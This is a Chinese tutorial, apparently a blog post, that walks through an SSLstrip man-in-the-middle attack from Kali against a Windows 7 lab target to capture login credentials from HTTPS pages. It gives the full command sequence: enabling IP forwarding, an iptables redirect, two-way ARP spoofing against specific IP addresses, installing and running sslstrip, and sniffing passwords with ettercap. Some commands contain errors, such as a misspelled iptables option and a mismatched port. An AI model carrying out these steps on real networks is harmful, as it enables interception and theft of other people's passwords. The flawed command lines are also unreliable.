一:SSL原理

SSL的作用是为了传输一些敏感信息(比如凭证账号密码)提供安全可靠的保障,确保用户使用浏览器和服务器之间传输的数据是安全可信的
当我们访问HTTPS类型的网站,浏览器首先是向服务器发送HTTP层面的请求,并且附带证书验证,在得到双方证书有效后,两者开始SSL安全通信

二:实战

原理:使用SSLstrip攻击,让我们的kali充当中间人(代理服务器),一边负责和靶机win7之间进行http明文通信,kali能够截获明文数据。另一方面kali进行路由转发,和原本win7要连接的服务器进行正常的https通信

工具sslstrip:kali2020是没有安装的,需要自行安装,参考后面的步骤

1.开启路由器转发(终端1)

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

2.开启iptables规则(终端2)

iptables -t nat -A PREROUTING -p tcp --destion-port 80 -j REDIRECT --to-port 1000

作用:在kali中实现从win7靶机截获的HTTP流量转发到SSLstrip中,并在10000端口上运行SSLstrip,实现win7原来要访问的远程服务器建立https(ssl)通信

3.ARP双向欺骗(冒充网关)
终端1:

arpspoof -i eth0 -t 192.168.1.183 192.168.1.1

终端2:

arpspoof -i eth0 -t 192.168.1.1 192.168.1.183

4.安装sslstrip套件工具(终端3)

git clone https://github.com/moxie0/sslstrip.git

(1)进入sslstrip文件目录,找到setup.py安装文件

cd sslstrip

(2)安装setup.py

python2 setup.py install

(3)继续安装模块(此时可能提示找不到pip2,下面有讲解)此时可能会因断开连接,多试几次,还是不行就去官网下载

pip2 install twisted

(4)安装第二个模块

pip2 install service_identity

(5)开启攻击:

sslstrip -l 10000

5.靶机登录https类型网页、

6.嗅探账号密码(终端4)

ettercap -Tq -i eth0

如果找不到pip2

sudo apt-get remove gedit
sudo apt-get install gedit(提示路径不对)
export PATH=/home/cyd/.local/bin/:$PATH(这个根据提示来)

HTTPS网页账号密码嗅探相关推荐

  1. 如何将网页保存为图片_网页账号密码该如何保存?

    我们在使用浏览器浏览一些网页的时候,需要输入我们的账号密码才能登陆,以保证安全.但是有时候浏览网页,不小心关掉了,重新打开时又要重新输入密码,这样会显得很繁琐.那么有什么办法能让 网页记住我们的账号密 ...

  2. java与es8实战之五:SpringBoot应用中操作es8(带安全检查:https、账号密码、API Key)

    欢迎访问我的GitHub 这里分类和汇总了欣宸的全部原创(含配套源码):https://github.com/zq2599/blog_demos 本篇概览 本篇是<java与es8实战>系 ...

  3. python登录网页账号密码_Python 通过爬虫实现GitHub网页的模拟登录的示例代码

    1. 实例描述 通过爬虫获取网页的信息时,有时需要登录网页后才可以获取网页中的可用数据,例如获取 GitHub 网页中的注册号码时,就需要先登录账号才能在登录后的页面中看到该信息,如下图所示.那么该如 ...

  4. python登录网页账号密码_遇到需要登录的网站怎么办?学好python,用这3招轻松搞定...

    你好 由于你是游客 无法查看本文 请你登录再进 谢谢合作..... 当你在爬某些网站的时候 需要你登录才可以获取数据 咋整? 莫慌 把这几招传授给你 让你以后从容应对 登录的常见方法无非是这两种 1. ...

  5. python登录网页账号密码_python03网页用户名密码登录

    2018-01-16 很成功,已经登录进去了. som系统的登录,使用用户名.密码. 思路:定位到用户名密码的输入框,输入有效的用户名.密码,点击登录按钮. #coding:utf-8 from se ...

  6. kali局域网APR攻击三https降级为http+网站账号密码获取

    https降级为http+网站账号密码获取 再次声明 小白一枚 小白一枚 小白一枚 更多教程和软件尽在:https://xiaobaif.cn 大家浏览网页时候可以看到有些网站是http开头的,有些是 ...

  7. Ettercap嗅探室友浏览的图片和账号密码

    一,介绍 本次实验介绍利用arp棋牌,搭配Ettercap嗅探目标IP正在浏览的图片,以及输入的账号密码. ettercap:最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能, ...

  8. HTTP/HTTPS账号密码获取

    kali系统命令: arpspoof -i 网卡 -t 目标IP 网关 #断网攻击 HTTP账号密码获取: 命令:echo 1 > /proc/sys/net/ipv4/ip_forward # ...

  9. 需账号密码登陆的网页爬虫

    对于普通网页的爬取十分简单,如果网站没有任何反爬机制,只要以下代码就可以实现对于网页的爬取 import requests html = requests.get(url='网址',headers=h ...

最新文章

  1. 在VS2008中DataGridView控件里DataGridViewComboBoxColumn列的Bug
  2. Android设计模式之——责任链模式
  3. 人人都能读懂的编译器原理
  4. [gstreamer] [002] porting from 0.10 to 1.0 knew how
  5. python lambda表达式及用法_python lambda表达式简单用法
  6. c语言水仙桃树编程,辰颐物语编辑部整理:春季适合种植哪些花卉品种?樱花和桃花怎么区分?...
  7. 像MIUI一样做Zabbix二次开发(5)——那些坑和优化方向
  8. QQ邮箱自动登录问题--frame嵌套元素定位
  9. GNS3下载安装和使用、本地主机虚拟网卡消失解决方案以及环回网卡添加与测试
  10. maven依赖包快速下载
  11. C语言二维数组指针用法
  12. Unity VR成像原理
  13. apatch zipoutputstream 进行解压缩时提示:不可预料的压缩文件末端
  14. 【UE4】联网游戏开发的正确姿势
  15. oracle请求http接口
  16. #POW和POS的优势和劣势
  17. Pytorch使用预训练模型进行图像分类
  18. Either re-interrupt this method or rethrow the “InterruptedException“ that can be caught here.
  19. ImageNet和COCO数据集分类
  20. 【魔兽世界】-逍遥魔兽V837-单体可用背包自动整理插件

热门文章

  1. 光伏储能联合运行的直流微电网matlab/simulink 储能系统双向DCDC充放电控制 光伏+MPPT控制
  2. 苹果 MAC 电脑 boot camp 助手装 Windows10 双系统出现的各种问题和解决方法
  3. fx3g485通讯模块_FX3G-485-BD用户手册三菱FX3G-485-BD数据通讯版手册 - 广州凌控
  4. 扫码枪多次扫码用空格分开
  5. 【毕业设计】Stm32家庭有害气体检测系统 - 物联网 嵌入式 单片机
  6. python连接mysql,并读取文件写入mysql
  7. 2022年网络工程师考试知识点:广域网技术
  8. 形函数的构造原理-有限元形函数的几个种类
  9. 电子计算机技术的发展情况,电子信息技术的应用特点与未来发展趋势
  10. Unsupervised Monocular Depth and Ego-motion Learning with Structure and Semantics 之论文详解